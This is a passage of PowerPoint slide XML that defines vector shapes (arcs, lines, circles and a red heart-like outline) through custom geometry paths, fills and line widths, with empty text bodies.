              <a:path w="107315" h="71755">
                <a:moveTo>
                  <a:pt x="107317" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="101169" y="26270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84959" y="49187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62042" y="65396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35772" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="60366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="48907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="22637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="11178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35772" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="object 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1459999" y="460761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41" name="object 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894986" y="618741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42" name="object 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460000" y="5903864"/>
            <a:ext cx="283128" cy="284387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="142875" h="143510">
                <a:moveTo>
                  <a:pt x="71544" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="45274" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45274" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97519" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120284" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136438" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84384" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95691" y="60366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103740" y="48907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106806" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103740" y="22637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95691" y="11178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84384" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B7B7B7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="object 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460000" y="5903864"/>
            <a:ext cx="283128" cy="284387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="142875" h="143510">
                <a:moveTo>
                  <a:pt x="142578" y="71544"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="136438" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120284" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97519" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45274" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45274" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84384" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106806" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84384" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142578" y="71544"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="object 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1459999" y="460761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45" name="object 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894986" y="618741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46" name="object 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884319" y="4607618"/>
            <a:ext cx="142193" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="71755" h="71755">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65396" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49187" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26270" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B7B7B7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="object 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884319" y="4607618"/>
            <a:ext cx="142193" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="71755" h="71755">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26270" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49187" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65396" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="object 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1459999" y="460761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49" name="object 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894986" y="618741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50" name="object 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742541" y="5903866"/>
            <a:ext cx="0" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="71755">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="71544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="object 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1459999" y="460761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52" name="object 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894986" y="618741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53" name="object 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884318" y="4891171"/>
            <a:ext cx="869517" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="438784">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="438468" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="object 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1459999" y="460761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55" name="object 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894986" y="618741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56" name="object 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1890395" y="5181815"/>
            <a:ext cx="575065" cy="718517"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="290194" h="362585">
                <a:moveTo>
                  <a:pt x="85853" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="77166" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68989" y="1022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60813" y="3066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56724" y="4599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53147" y="6132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49059" y="7665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31173" y="19930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28106" y="22485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25040" y="26062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21974" y="29129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11753" y="43438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7665" y="51614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6132" y="55702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4599" y="60302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3066" y="64390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2044" y="68989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1533" y="73078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="511" y="77677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="82787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1022" y="101184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4088" y="115493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144622" y="362324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285157" y="115493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286179" y="110894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288223" y="106295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288734" y="101184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289757" y="91986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289757" y="82787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289245" y="77677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288223" y="73078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287712" y="68989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286179" y="64390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285157" y="60302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283624" y="55702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277492" y="43438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275448" y="39860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="272892" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144622" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141045" y="31684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="5621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90453" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85853" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="290194" h="362585">
                <a:moveTo>
                  <a:pt x="212079" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="203903" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199303" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195215" y="1533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190616" y="2555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186527" y="4088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181928" y="5621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181417" y="7665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173240" y="10220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169152" y="12775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165064" y="15842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160465" y="18908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156887" y="22996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144622" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="272892" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270337" y="32706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267271" y="29129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264716" y="26062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261650" y="22485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="258072" y="19930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="255006" y="16864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247852" y="11753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240697" y="7665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236609" y="6132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233032" y="4599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228943" y="3066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220767" y="1022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216678" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212079" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="object 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1890395" y="5181815"/>
            <a:ext cx="575065" cy="718517"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="290194" h="362585">
                <a:moveTo>
                  <a:pt x="144622" y="362324"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4088" y="115493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1022" y="101184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="91986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="87387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="82787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="511" y="77677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1533" y="73078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2044" y="68989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3066" y="64390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4599" y="60302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6132" y="55702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7665" y="51614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9709" y="47526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11753" y="43438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14308" y="39860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16864" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19419" y="32706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21974" y="29129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25040" y="26062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28106" y="22485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31173" y="19930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53147" y="6132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56724" y="4599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60813" y="3066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64901" y="2044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68989" y="1022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73078" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77166" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81765" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85853" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90453" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94541" y="1533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98629" y="2555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103229" y="4088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="5621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111916" y="7665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116005" y="10220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120093" y="12775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144622" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156887" y="22996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160465" y="18908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165064" y="15842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169152" y="12775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173240" y="10220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181417" y="7665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181928" y="5621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186527" y="4088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190616" y="2555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195215" y="1533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199303" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203903" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207991" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216678" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220767" y="1022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224855" y="2044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228943" y="3066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233032" y="4599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236609" y="6132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240697" y="7665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244274" y="9709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247852" y="11753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251429" y="14308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="255006" y="16864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="258072" y="19930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261650" y="22485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264716" y="26062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267271" y="29129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270337" y="32706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="272892" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275448" y="39860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277492" y="43438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279536" y="47526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="281580" y="51614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283624" y="55702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285157" y="60302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286179" y="64390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287712" y="68989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288223" y="73078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289245" y="77677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289757" y="82787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289757" y="87387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289757" y="91986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289245" y="96585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288734" y="101184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288223" y="106295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286179" y="110894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285157" y="115493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144622" y="362324"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14462">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="object 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1890394" y="5181814"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14462">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="object 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2464591" y="5899814"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14462">
            <a:solidFill>
